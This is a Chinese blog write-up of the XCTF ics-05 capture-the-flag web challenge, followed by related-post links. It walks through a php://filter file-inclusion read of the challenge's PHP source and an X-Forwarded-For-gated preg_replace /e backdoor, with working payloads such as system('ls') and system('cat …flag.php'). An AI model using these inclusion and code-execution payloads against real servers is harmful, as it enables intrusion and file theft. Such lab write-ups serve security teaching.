攻防世界ics-05

已于 2023-05-30 10:50:58 修改
阅读量34 收藏
点赞数
分类专栏: 攻防世界系列 文章标签: php 数学建模 开发语言 网络安全 运维
于 2023-05-30 10:48:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45955869/article/details/130905674
版权

提示:本人24小时在线,如有疑问,可联系我!

文章目录

前言

提示:攻防世界ics-05

一、题目?

在这里插入图片描述
有点眼熟!
在这里插入图片描述
应该在这个里面1!
慢慢找吧!

二、解决方法

御剑扫一扫目录再说!
在这里插入图片描述
又看了一下页面源码!
在这里插入图片描述
难道是?page=index
试试呗!
在这里插入图片描述
出现在页面上!
试试参数index.php返回了OK
在这里插入图片描述

这不就清楚了是个文件包含漏洞!
那试一试php://input吧!还记得吗?我演示一遍吧!
在这里插入图片描述
使用php://filter
?page=php://filter/resource=index.php
在这里插入图片描述
?page=php://filter/read=convert.base64-encode/resource=index.php
在这里插入图片描述
可以了!
解码
在这里插入图片描述
全部解码:可以看看
需要的,部分代码在后面

<?php
error_reporting(0);
 
@session_start();
posix_setuid(1000);
 
 
?>
<!DOCTYPE HTML>
<html>
 
<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设备维护中心</title>
    <meta charset="utf-8">
</head>
 
<body>
    <ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
    </ul>
    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
        <legend>设备列表</legend>
    </fieldset>
    <table class="layui-hide" id="test"></table>
    <script type="text/html" id="switchTpl">
        <!-- 这里的 checked 的状态只是演示 -->
        <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
    </script>
    <script src="layui/layui.js" charset="utf-8"></script>
    <script>
    layui.use('table', function() {
        var table = layui.table,
            form = layui.form;
        table.render({
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    { type: 'numbers' },
                     { type: 'checkbox' },
                     { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                     { field: 'name', title: '设备名', templet: '#nameTpl' },
                     { field: 'area', title: '区域' },
                     { field: 'status', title: '维护状态', minWidth: 120, sort: true },
                     { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
    </script>
    <script>
    layui.use('element', function() {
        var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
        //监听导航点击
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) {
?>
    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />
<?php
}else{
?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php
                if (strpos($page, 'input') > 0) {
                    die();
                }
                if (strpos($page, 'ta:text') > 0) {
                    die();
                }
                if (strpos($page, 'text') > 0) {
                    die();
                }
                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />
<?php
}}
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
    echo "<br >Welcome My Admin ! <br >";
    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];
    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }
}
?>
</body>
</html>

看这个就够了!

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
    echo "<br >Welcome My Admin ! <br >";
    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];
    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }
}

pat? rep?
3.利用X-Forwarded-For和preg_replace因/e修饰符的使用,使得replacement里的字符串可以以php代码运行
在这里插入图片描述
在这里插入图片描述
哎呀呀!试了好多次。
X-Forwarded-For: 127.0.0.1必须添加到中间,最后面不行啊!

?pat=/(.)/e&rep=system(“ls”)&sub=just test
#读取目录

在这里插入图片描述

/index.php?pat=/(.)/e&rep=system(%27ls+s3chahahaDir%2Fflag/flag.php%27)&sub=harry

在这里插入图片描述
把ls换cat

?pat=/(.)/e&rep=system(“cat s3chahahaDir/flag/flag.php”)&sub= just test
#读取flag

(注意pattern和subject的一致性)

在这里插入图片描述
在这里插入图片描述
答案:
cyberpeace{a9e2b55f4cc51eb9bbc8be13c628c5ea}
每个人的不一样。别复制,做不出来联系我就可。
在这里插入图片描述

知识点总结:

1.伪协议
2.preg_place漏洞

qq_45955869
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 | XCTF】攻防世界 ics-05 解题详析
等风来
05-31 3632
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件,如。构造Payload如下,实现将sub中的。根据提示,进入维护中心页面。查看源代码 发现注入点。
攻防世界Training-Stegano-1
10-31
攻防世界Training-Stegano-1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127614642
攻防世界 ics-05
weixin_52268949的博客
03-21 108
此处存在preg_replace函数,感觉会存在命令注入漏洞,函数作用:搜索subject中匹配pattern的部分,以replacement进行替换。此处考察的是preg_replace函数使用/e参数导致代码执行的问题。也就是说,pat值和sub值相同,rep的代码会执行。并且没有对pat参数进行过滤,所以这里我们可以传入"-e"触发漏洞。我们重点来观察url发现这里可能存在文件包含,我们使用伪协议读取看看。进入题目依旧是这个场景我们去设备维护中心看看。开始审计代码简单看了一下之后发现利用点在这里。
[XCTF_网络安全] 攻防世界 ics-05 解题详析
qingkahui24689的博客
05-24 535
[XCTF_网络安全] 攻防世界 ics-05 解题详析,该题考察XFF及/e修正符的相关知识。
攻防世界 ics-05 wp
freerats的博客
06-04 295
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 打开设备维护中心页面上没什么,查看源码发现?page=index 看到这个可能存在文件包含读源码的漏洞 php://filter/read=convert.base64-encode/resource=index.php 使用php协议读取index.php页面的base64格式,解码即可得到源码 源码比较长,核心部分就是以下这一段 这里的主要考点就是preg_replace()命令执行漏洞 官方的解释是 mixed preg_replac
攻防世界——ics-05
m0_62063669的博客
06-21 2216
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在源代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
攻防世界-ics-05
m0_62094846的博客
11-17 2132
点开后发现只有设备维护中心可以点开 看到数据端口请求异常,先想到用burp修改域名,但是修改后 除了加了一句话没什么用 看看源代码,有page=index(看wp的,真想不到和文件包含有关) ?page=php://filter/read=convert.base64-encode/resource=index.php 应该是base64 <?php error_reporting(0); @session_start(); posix_setuid(1...
攻防世界 ics-05 write up
weixin_30872157的博客
09-20 194
访问,由于提示说是后台,所以访问index.php/my-webshell(路径任意) 发现是文件包含页面 http://111.198.29.45:42305/index.php/dsf?page=php://filter/read=convert.base64-encode/resource=index.phpbase64decode重点:if ($_SERVER['HTT...
[wp] 攻防世界 ics-05
MercyLin的博客
09-06 1242
进入题目发现也只有设备维护中心的选项可以点 page传的参数在页面会有回显,fuzz一下:
攻防世界-ics-05-(详细操作)做题笔记
qq_43715020的博客
06-15 1481
攻防世界-ics-05-(详细操作)做题笔记
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界nice-bgm杂项
11-20
攻防世界nice_bgm杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953246
攻防世界Let-god-knows杂项
11-20
攻防世界Let_god_knows杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947532
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 252
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
无回显XXE攻击:隐秘的数据泄露技术
最新发布
weixin_43822401的博客
06-14 288
无回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护网络安全至关重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
软考初级网络管理员_07_网络单选题
2301_80961833的博客
06-12 899
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域网,下面的描述中错误的是()。
网络安全练气篇——PHP编程语言基础
weixin_55762309的博客
06-13 803
(外文名:PHP:Hypertext Preprocessor,中文名:“超文本预处理器”) 是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,利于学习,使用广泛,主要适用于Web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用) 文档中去执行,执行效率比完全生成HTML标记的CGI要高许多,PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
攻防世界ics-06
08-12
- *2* *3* [攻防世界Web “ics-06、unserialize3、supersqli”题解](https://blog.csdn.net/qq_53325209/article/details/124255388)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值